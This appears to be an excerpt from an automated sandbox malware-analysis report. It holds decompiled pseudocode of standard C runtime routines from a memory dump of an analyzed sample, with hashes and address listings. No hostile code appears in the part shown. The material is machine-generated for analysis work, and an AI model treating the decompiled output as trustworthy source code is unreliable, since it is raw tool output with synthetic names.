                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID:
                                                                        • API String ID: 10892065-0
                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 334 40ea0a-40ea16 call 40e8de 336 40ea1b-40ea1f 334->336
                                                                        C-Code - Quality: 25%
                                                                        			E0040EA0A(intOrPtr _a4) {
                                                                        				void* __ebp;
                                                                        				void* _t2;
                                                                        				void* _t3;
                                                                        				void* _t4;
                                                                        				void* _t5;
                                                                        				void* _t8;
                                                                        
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(_a4);
                                                                        				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                        				return _t2;
                                                                        			}









                                                                        0x0040ea0f
                                                                        0x0040ea11
                                                                        0x0040ea13
                                                                        0x0040ea16
                                                                        0x0040ea1f

                                                                        APIs
                                                                        • _doexit.LIBCMT ref: 0040EA16
                                                                          • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                        • String ID:
                                                                        • API String ID: 1597249276-0
                                                                        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                        • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                        • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.365436489.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8ed000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3f7dc15a7cf912fb110c4d6788033beab173cfc1dee440342390bc5c8e4784b
                                                                        • Instruction ID: b438b556e73021a75417aa9755850089fed75f962d0db7d4240c839cbb3213d9
                                                                        • Opcode Fuzzy Hash: c3f7dc15a7cf912fb110c4d6788033beab173cfc1dee440342390bc5c8e4784b
                                                                        • Instruction Fuzzy Hash: B401806140D7C09FD7124B26CC84752BFA8EF53224F1984CBD884DF297C2685C49C7B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.365436489.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8ed000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d23b59e7c80f0b53317d845506208301ef6bb46dd12b01fef7865af797248614
                                                                        • Instruction ID: dd1b11356de9be8e83448d8ec8e30087bc4273b160e8fd459f6b3393c4ac5987
                                                                        • Opcode Fuzzy Hash: d23b59e7c80f0b53317d845506208301ef6bb46dd12b01fef7865af797248614
                                                                        • Instruction Fuzzy Hash: 8A01A7714047C4AAE7108A17CC84B66BFD8FF52364F1CC159ED559B246C2799C49C6F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                        				intOrPtr _v0;
                                                                        				void* _v804;
                                                                        				intOrPtr _v808;
                                                                        				intOrPtr _v812;
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t13;
                                                                        				long _t17;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t25;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr* _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t26 = __edi;
                                                                        				_t25 = __edx;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t6 = __eax;
                                                                        				_t34 = _t22 -  *0x422234; // 0xda2ab297
                                                                        				if(_t34 == 0) {
                                                                        					asm("repe ret");
                                                                        				}
                                                                        				 *0x423b98 = _t6;
                                                                        				 *0x423b94 = _t22;
                                                                        				 *0x423b90 = _t25;
                                                                        				 *0x423b8c = _t21;
                                                                        				 *0x423b88 = _t27;
                                                                        				 *0x423b84 = _t26;
                                                                        				 *0x423bb0 = ss;
                                                                        				 *0x423ba4 = cs;
                                                                        				 *0x423b80 = ds;
                                                                        				 *0x423b7c = es;
                                                                        				 *0x423b78 = fs;
                                                                        				 *0x423b74 = gs;
                                                                        				asm("pushfd");
                                                                        				_pop( *0x423ba8);
                                                                        				 *0x423b9c =  *_t31;
                                                                        				 *0x423ba0 = _v0;
                                                                        				 *0x423bac =  &_a4;
                                                                        				 *0x423ae8 = 0x10001;
                                                                        				_t11 =  *0x423ba0; // 0x0
                                                                        				 *0x423a9c = _t11;
                                                                        				 *0x423a90 = 0xc0000409;
                                                                        				 *0x423a94 = 1;
                                                                        				_t12 =  *0x422234; // 0xda2ab297
                                                                        				_v812 = _t12;
                                                                        				_t13 =  *0x422238; // 0x25d54d68
                                                                        				_v808 = _t13;
                                                                        				 *0x423ae0 = IsDebuggerPresent();
                                                                        				_push(1);
                                                                        				E004138FC(_t14);
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                        				if( *0x423ae0 == 0) {
                                                                        					_push(1);
                                                                        					E004138FC(_t17);
                                                                        				}
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



















                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce0f
                                                                        0x0040ce11
                                                                        0x0040ce11
                                                                        0x00413644
                                                                        0x00413649
                                                                        0x0041364f
                                                                        0x00413655
                                                                        0x0041365b
                                                                        0x00413661
                                                                        0x00413667
                                                                        0x0041366e
                                                                        0x00413675
                                                                        0x0041367c
                                                                        0x00413683
                                                                        0x0041368a
                                                                        0x00413691
                                                                        0x00413692
                                                                        0x0041369b
                                                                        0x004136a3
                                                                        0x004136ab
                                                                        0x004136b6
                                                                        0x004136c0
                                                                        0x004136c5
                                                                        0x004136ca
                                                                        0x004136d4
                                                                        0x004136de
                                                                        0x004136e3
                                                                        0x004136e9
                                                                        0x004136ee
                                                                        0x004136fa
                                                                        0x004136ff
                                                                        0x00413701
                                                                        0x00413709
                                                                        0x00413714
                                                                        0x00413721
                                                                        0x00413723
                                                                        0x00413725
                                                                        0x0041372a
                                                                        0x0041373e

                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID:
                                                                        • API String ID: 2579439406-0
                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040ADB0(intOrPtr* __ecx) {
                                                                        				void* _t5;
                                                                        				intOrPtr* _t11;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				_t5 =  *(__ecx + 8);
                                                                        				 *__ecx = 0x41eff0;
                                                                        				if(_t5 != 0) {
                                                                        					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                        				}
                                                                        				if( *(_t11 + 0xc) != 0) {
                                                                        					_t5 = GetProcessHeap();
                                                                        					if(_t5 != 0) {
                                                                        						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                        					}
                                                                        				}
                                                                        				return _t5;
                                                                        			}





                                                                        0x0040adb3
                                                                        0x0040adb5
                                                                        0x0040adb8
                                                                        0x0040adc0
                                                                        0x0040adc8
                                                                        0x0040adc8
                                                                        0x0040adce
                                                                        0x0040add0
                                                                        0x0040add8
                                                                        0x00000000
                                                                        0x0040ade1
                                                                        0x0040add8
                                                                        0x0040ade8

                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 3859560861-0
                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v24;
                                                                        				void* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t110;
                                                                        				intOrPtr _t112;
                                                                        				intOrPtr _t113;
                                                                        				short* _t115;
                                                                        				short* _t116;
                                                                        				char* _t120;
                                                                        				short* _t121;
                                                                        				short* _t123;
                                                                        				short* _t127;
                                                                        				int _t128;
                                                                        				short* _t141;
                                                                        				signed int _t144;
                                                                        				void* _t146;
                                                                        				short* _t147;
                                                                        				signed int _t150;
                                                                        				short* _t153;
                                                                        				char* _t157;
                                                                        				int _t160;
                                                                        				long _t162;
                                                                        				signed int _t174;
                                                                        				signed int _t178;
                                                                        				signed int _t179;
                                                                        				int _t182;
                                                                        				short* _t184;
                                                                        				signed int _t186;
                                                                        				signed int _t188;
                                                                        				short* _t189;
                                                                        				int _t191;
                                                                        				intOrPtr _t194;
                                                                        				int _t207;
                                                                        
                                                                        				_t110 =  *0x422234; // 0xda2ab297
                                                                        				_v8 = _t110 ^ _t188;
                                                                        				_t184 = __ecx;
                                                                        				_t194 =  *0x423e7c; // 0x1
                                                                        				if(_t194 == 0) {
                                                                        					_t182 = 1;
                                                                        					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                        						_t162 = GetLastError();
                                                                        						__eflags = _t162 - 0x78;
                                                                        						if(_t162 == 0x78) {
                                                                        							 *0x423e7c = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x423e7c = 1;
                                                                        					}
                                                                        				}
                                                                        				if(_a16 <= 0) {
                                                                        					L13:
                                                                        					_t112 =  *0x423e7c; // 0x1
                                                                        					if(_t112 == 2 || _t112 == 0) {
                                                                        						_v16 = 0;
                                                                        						_v20 = 0;
                                                                        						__eflags = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                        						}
                                                                        						__eflags = _a28;
                                                                        						if(_a28 == 0) {
                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                        						}
                                                                        						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                        						_v24 = _t113;
                                                                        						__eflags = _t113 - 0xffffffff;
                                                                        						if(_t113 != 0xffffffff) {
                                                                        							__eflags = _t113 - _a28;
                                                                        							if(_t113 == _a28) {
                                                                        								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                        								L78:
                                                                        								__eflags = _v16;
                                                                        								if(__eflags != 0) {
                                                                        									_push(_v16);
                                                                        									E0040B6B5(0, _t182, _t184, __eflags);
                                                                        								}
                                                                        								_t115 = _v20;
                                                                        								__eflags = _t115;
                                                                        								if(_t115 != 0) {
                                                                        									__eflags = _a20 - _t115;
                                                                        									if(__eflags != 0) {
                                                                        										_push(_t115);
                                                                        										E0040B6B5(0, _t182, _t184, __eflags);
                                                                        									}
                                                                        								}
                                                                        								_t116 = _t184;
                                                                        								goto L84;
                                                                        							}
                                                                        							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                        							_t191 =  &(_t189[0xc]);
                                                                        							_v16 = _t120;
                                                                        							__eflags = _t120;
                                                                        							if(_t120 == 0) {
                                                                        								goto L58;
                                                                        							}
                                                                        							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                        							_v12 = _t121;
                                                                        							__eflags = _t121;
                                                                        							if(__eflags != 0) {
                                                                        								if(__eflags <= 0) {
                                                                        									L71:
                                                                        									_t182 = 0;
                                                                        									__eflags = 0;
                                                                        									L72:
                                                                        									__eflags = _t182;
                                                                        									if(_t182 == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									E0040BA30(_t182, _t182, 0, _v12);
                                                                        									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                        									_v12 = _t123;
                                                                        									__eflags = _t123;
                                                                        									if(_t123 != 0) {
                                                                        										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                        										_v20 = _t186;
                                                                        										asm("sbb esi, esi");
                                                                        										_t184 =  ~_t186 & _v12;
                                                                        										__eflags = _t184;
                                                                        									} else {
                                                                        										_t184 = 0;
                                                                        									}
                                                                        									E004147AE(_t182);
                                                                        									goto L78;
                                                                        								}
                                                                        								__eflags = _t121 - 0xffffffe0;
                                                                        								if(_t121 > 0xffffffe0) {
                                                                        									goto L71;
                                                                        								}
                                                                        								_t127 =  &(_t121[4]);
                                                                        								__eflags = _t127 - 0x400;
                                                                        								if(_t127 > 0x400) {
                                                                        									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                        									__eflags = _t128;
                                                                        									if(_t128 != 0) {
                                                                        										 *_t128 = 0xdddd;
                                                                        										_t128 = _t128 + 8;
                                                                        										__eflags = _t128;
                                                                        									}
                                                                        									_t182 = _t128;
                                                                        									goto L72;
                                                                        								}
                                                                        								E0040CFB0(_t127);
                                                                        								_t182 = _t191;
                                                                        								__eflags = _t182;
                                                                        								if(_t182 == 0) {
                                                                        									goto L62;
                                                                        								}
                                                                        								 *_t182 = 0xcccc;
                                                                        								_t182 = _t182 + 8;
                                                                        								goto L72;
                                                                        							}
                                                                        							L62:
                                                                        							_t184 = 0;
                                                                        							goto L78;
                                                                        						} else {
                                                                        							goto L58;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t112 != 1) {
                                                                        							L58:
                                                                        							_t116 = 0;
                                                                        							L84:
                                                                        							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                        						}
                                                                        						_v12 = 0;
                                                                        						if(_a28 == 0) {
                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                        						}
                                                                        						_t184 = MultiByteToWideChar;
                                                                        						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                        						_t207 = _t182;
                                                                        						if(_t207 == 0) {
                                                                        							goto L58;
                                                                        						} else {
                                                                        							if(_t207 <= 0) {
                                                                        								L28:
                                                                        								_v16 = 0;
                                                                        								L29:
                                                                        								if(_v16 == 0) {
                                                                        									goto L58;
                                                                        								}
                                                                        								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                        									L52:
                                                                        									E004147AE(_v16);
                                                                        									_t116 = _v12;
                                                                        									goto L84;
                                                                        								}
                                                                        								_t184 = LCMapStringW;
                                                                        								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                        								_v12 = _t174;
                                                                        								if(_t174 == 0) {
                                                                        									goto L52;
                                                                        								}
                                                                        								if((_a8 & 0x00000400) == 0) {
                                                                        									__eflags = _t174;
                                                                        									if(_t174 <= 0) {
                                                                        										L44:
                                                                        										_t184 = 0;
                                                                        										__eflags = 0;
                                                                        										L45:
                                                                        										__eflags = _t184;
                                                                        										if(_t184 != 0) {
                                                                        											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                        											__eflags = _t141;
                                                                        											if(_t141 != 0) {
                                                                        												_push(0);
                                                                        												_push(0);
                                                                        												__eflags = _a24;
                                                                        												if(_a24 != 0) {
                                                                        													_push(_a24);
                                                                        													_push(_a20);
                                                                        												} else {
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        												}
                                                                        												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                        											}
                                                                        											E004147AE(_t184);
                                                                        										}
                                                                        										goto L52;
                                                                        									}
                                                                        									_t144 = 0xffffffe0;
                                                                        									_t179 = _t144 % _t174;
                                                                        									__eflags = _t144 / _t174 - 2;
                                                                        									if(_t144 / _t174 < 2) {
                                                                        										goto L44;
                                                                        									}
                                                                        									_t52 = _t174 + 8; // 0x8
                                                                        									_t146 = _t174 + _t52;
                                                                        									__eflags = _t146 - 0x400;
                                                                        									if(_t146 > 0x400) {
                                                                        										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                        										__eflags = _t147;
                                                                        										if(_t147 != 0) {
                                                                        											 *_t147 = 0xdddd;
                                                                        											_t147 =  &(_t147[4]);
                                                                        											__eflags = _t147;
                                                                        										}
                                                                        										_t184 = _t147;
                                                                        										goto L45;
                                                                        									}
                                                                        									E0040CFB0(_t146);
                                                                        									_t184 = _t189;
                                                                        									__eflags = _t184;
                                                                        									if(_t184 == 0) {
                                                                        										goto L52;
                                                                        									}
                                                                        									 *_t184 = 0xcccc;
                                                                        									_t184 =  &(_t184[4]);
                                                                        									goto L45;
                                                                        								}
                                                                        								if(_a24 != 0 && _t174 <= _a24) {
                                                                        									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                        								}
                                                                        								goto L52;
                                                                        							}
                                                                        							_t150 = 0xffffffe0;
                                                                        							_t179 = _t150 % _t182;
                                                                        							if(_t150 / _t182 < 2) {
                                                                        								goto L28;
                                                                        							}
                                                                        							_t25 = _t182 + 8; // 0x8
                                                                        							_t152 = _t182 + _t25;
                                                                        							if(_t182 + _t25 > 0x400) {
                                                                        								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                        								__eflags = _t153;
                                                                        								if(_t153 == 0) {
                                                                        									L27:
                                                                        									_v16 = _t153;
                                                                        									goto L29;
                                                                        								}
                                                                        								 *_t153 = 0xdddd;
                                                                        								L26:
                                                                        								_t153 =  &(_t153[4]);
                                                                        								goto L27;
                                                                        							}
                                                                        							E0040CFB0(_t152);
                                                                        							_t153 = _t189;
                                                                        							if(_t153 == 0) {
                                                                        								goto L27;
                                                                        							}
                                                                        							 *_t153 = 0xcccc;
                                                                        							goto L26;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t178 = _a16;
                                                                        				_t157 = _a12;
                                                                        				while(1) {
                                                                        					_t178 = _t178 - 1;
                                                                        					if( *_t157 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t157 =  &(_t157[1]);
                                                                        					if(_t178 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					_t178 = _t178 | 0xffffffff;
                                                                        					break;
                                                                        				}
                                                                        				_t160 = _a16 - _t178 - 1;
                                                                        				if(_t160 < _a16) {
                                                                        					_t160 = _t160 + 1;
                                                                        				}
                                                                        				_a16 = _t160;
                                                                        				goto L13;
                                                                        			}











































                                                                        0x00417089
                                                                        0x00417090
                                                                        0x00417098
                                                                        0x0041709a
                                                                        0x004170a0
                                                                        0x004170a6
                                                                        0x004170bb
                                                                        0x004170c5
                                                                        0x004170cb
                                                                        0x004170ce
                                                                        0x004170d0
                                                                        0x004170d0
                                                                        0x004170bd
                                                                        0x004170bd
                                                                        0x004170bd
                                                                        0x004170bb
                                                                        0x004170dd
                                                                        0x00417101
                                                                        0x00417101
                                                                        0x00417109
                                                                        0x004172bb
                                                                        0x004172be
                                                                        0x004172c1
                                                                        0x004172c4
                                                                        0x004172cb
                                                                        0x004172cb
                                                                        0x004172ce
                                                                        0x004172d1
                                                                        0x004172d8
                                                                        0x004172d8
                                                                        0x004172de
                                                                        0x004172e4
                                                                        0x004172e7
                                                                        0x004172ea
                                                                        0x004172f3
                                                                        0x004172f6
                                                                        0x004173ef
                                                                        0x004173f1
                                                                        0x004173f1
                                                                        0x004173f4
                                                                        0x004173f6
                                                                        0x004173f9
                                                                        0x004173fe
                                                                        0x004173ff
                                                                        0x00417402
                                                                        0x00417404
                                                                        0x00417406
                                                                        0x00417409
                                                                        0x0041740b
                                                                        0x0041740c
                                                                        0x00417411
                                                                        0x00417409
                                                                        0x00417412
                                                                        0x00000000
                                                                        0x00417412
                                                                        0x00417309
                                                                        0x0041730e
                                                                        0x00417311
                                                                        0x00417314
                                                                        0x00417316
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041732a
                                                                        0x0041732c
                                                                        0x0041732f
                                                                        0x00417331
                                                                        0x0041733a
                                                                        0x00417379
                                                                        0x00417379
                                                                        0x00417379
                                                                        0x0041737b
                                                                        0x0041737b
                                                                        0x0041737d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417384
                                                                        0x0041739c
                                                                        0x0041739e
                                                                        0x004173a1
                                                                        0x004173a3
                                                                        0x004173bf
                                                                        0x004173c1
                                                                        0x004173c9
                                                                        0x004173cb
                                                                        0x004173cb
                                                                        0x004173a5
                                                                        0x004173a5
                                                                        0x004173a5
                                                                        0x004173cf
                                                                        0x00000000
                                                                        0x004173d4
                                                                        0x0041733c
                                                                        0x0041733f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417341
                                                                        0x00417344
                                                                        0x00417349
                                                                        0x00417362
                                                                        0x00417368
                                                                        0x0041736a
                                                                        0x0041736c
                                                                        0x00417372
                                                                        0x00417372
                                                                        0x00417372
                                                                        0x00417375
                                                                        0x00000000
                                                                        0x00417375
                                                                        0x0041734b
                                                                        0x00417350
                                                                        0x00417352
                                                                        0x00417354
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417356
                                                                        0x0041735c
                                                                        0x00000000
                                                                        0x0041735c
                                                                        0x00417333
                                                                        0x00417333
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417117
                                                                        0x0041711a
                                                                        0x004172ec
                                                                        0x004172ec
                                                                        0x00417414
                                                                        0x00417425
                                                                        0x00417425
                                                                        0x00417120
                                                                        0x00417126
                                                                        0x0041712d
                                                                        0x0041712d
                                                                        0x00417130
                                                                        0x00417153
                                                                        0x00417155
                                                                        0x00417157
                                                                        0x00000000
                                                                        0x0041715d
                                                                        0x0041715d
                                                                        0x004171a2
                                                                        0x004171a2
                                                                        0x004171a5
                                                                        0x004171a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004171c1
                                                                        0x004172aa
                                                                        0x004172ad
                                                                        0x004172b2
                                                                        0x00000000
                                                                        0x004172b5
                                                                        0x004171c7
                                                                        0x004171db
                                                                        0x004171dd
                                                                        0x004171e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004171ef
                                                                        0x0041721a
                                                                        0x0041721c
                                                                        0x00417263
                                                                        0x00417263
                                                                        0x00417263
                                                                        0x00417265
                                                                        0x00417265
                                                                        0x00417267
                                                                        0x00417277
                                                                        0x0041727d
                                                                        0x0041727f
                                                                        0x00417281
                                                                        0x00417282
                                                                        0x00417283
                                                                        0x00417286
                                                                        0x0041728c
                                                                        0x0041728f
                                                                        0x00417288
                                                                        0x00417288
                                                                        0x00417289
                                                                        0x00417289
                                                                        0x004172a0
                                                                        0x004172a0
                                                                        0x004172a4
                                                                        0x004172a9
                                                                        0x00000000
                                                                        0x00417267
                                                                        0x00417222
                                                                        0x00417223
                                                                        0x00417225
                                                                        0x00417228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041722a
                                                                        0x0041722a
                                                                        0x0041722e
                                                                        0x00417233
                                                                        0x0041724c
                                                                        0x00417252
                                                                        0x00417254
                                                                        0x00417256
                                                                        0x0041725c
                                                                        0x0041725c
                                                                        0x0041725c
                                                                        0x0041725f
                                                                        0x00000000
                                                                        0x0041725f
                                                                        0x00417235
                                                                        0x0041723a
                                                                        0x0041723c
                                                                        0x0041723e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417240
                                                                        0x00417246
                                                                        0x00000000
                                                                        0x00417246
                                                                        0x004171f4
                                                                        0x00417213
                                                                        0x00417213
                                                                        0x00000000
                                                                        0x004171f4
                                                                        0x00417163
                                                                        0x00417164
                                                                        0x00417169
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041716b
                                                                        0x0041716b
                                                                        0x00417174
                                                                        0x0041718a
                                                                        0x00417190
                                                                        0x00417192
                                                                        0x0041719d
                                                                        0x0041719d
                                                                        0x00000000
                                                                        0x0041719d
                                                                        0x00417194
                                                                        0x0041719a
                                                                        0x0041719a
                                                                        0x00000000
                                                                        0x0041719a
                                                                        0x00417176
                                                                        0x0041717b
                                                                        0x0041717f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417181
                                                                        0x00000000
                                                                        0x00417181
                                                                        0x00417157
                                                                        0x00417109
                                                                        0x004170df
                                                                        0x004170e2
                                                                        0x004170e5
                                                                        0x004170e5
                                                                        0x004170e8
